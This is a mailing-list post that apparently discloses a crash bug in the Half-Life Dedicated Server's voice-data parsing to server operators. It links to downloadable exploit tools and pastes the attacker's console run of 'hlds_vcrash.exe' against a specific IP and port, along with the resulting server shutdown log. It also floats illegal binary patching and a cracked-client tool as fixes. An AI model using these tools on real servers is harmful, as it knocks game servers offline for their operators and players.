Hi all, I've got info from some friends that due to error in HLDS engine code whole server could be shut down. According to unknown-source code of propably HLDS problem is propably in function SV_ParseVoiceData.
http://ampaste.net/m32c5281a // Read in the data. nDataLength = MSG_ReadShort(); --> if( nDataLength > sizeof(chReceived) ) { Host_Error("SV_ParseVoiceData: invalid incoming packet.\n"); return; } MSG_ReadBuf( nDataLength, chReceived ); I had tested hlds_vcrash on hlds_i686/linux 4617 and it worked well - I'm suprised that Valve did nothing in this case, because exploits are available since 1st March... http://rghost.net/1076529 I had also backuped them on my server, so you can check them against your servers. http://damianlimek.pl/hlds-exploit/ Unfortunately they could work, so it may be problem for hosting companies which can get more e-mails about 'my CS1.6 server in your company has crashed over 9000 times!' Possible fixes are: using DPROTO [unsure about legal way of using this - it doesn't modify HLDS code, but allow to use cracked clients...], or trying to modify hlds_i686 binary [which is illegal of course]. There's how it works on : Server side: [....dropping clients...] 16:09 Dropped ---->MaRcIn<---- from server 16:09 Reason: Server shutting down 16:09 Dropped KuBa from server 16:09 Reason: Server shutting down 16:09 FATAL ERROR (shutting down): Host_Error: SV_ParseVoiceData: invalid incoming packet. 16:09 16:09 16:09 Add "-debug" to the ./hlds_run command line to generate a debug.log to help with solving this 16:09 problem 16:09 czw mar 4 16:08:46 CET 2010: Server restart in 10 seconds 16:09 Attacker's side: 17:16 C:\Documents and Settings\Damian\Pulpit>hlds_vcrash.exe 195.114.0.89 27015 48 3 17:16 Trying to connect to 195.114.0.89:27015; protocol=48; auth_type=3 17:16 17:16 Challenging... OK 17:16 Connecting... OK 17:16 Sending exploit... OK 17:16 Done. 17:16 17:16 17:16 Press any key to exit 17:16 But remember, You use these programs on your own risk, and I cannot guarantee that it's legal to use them. -- Damian _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds_linux
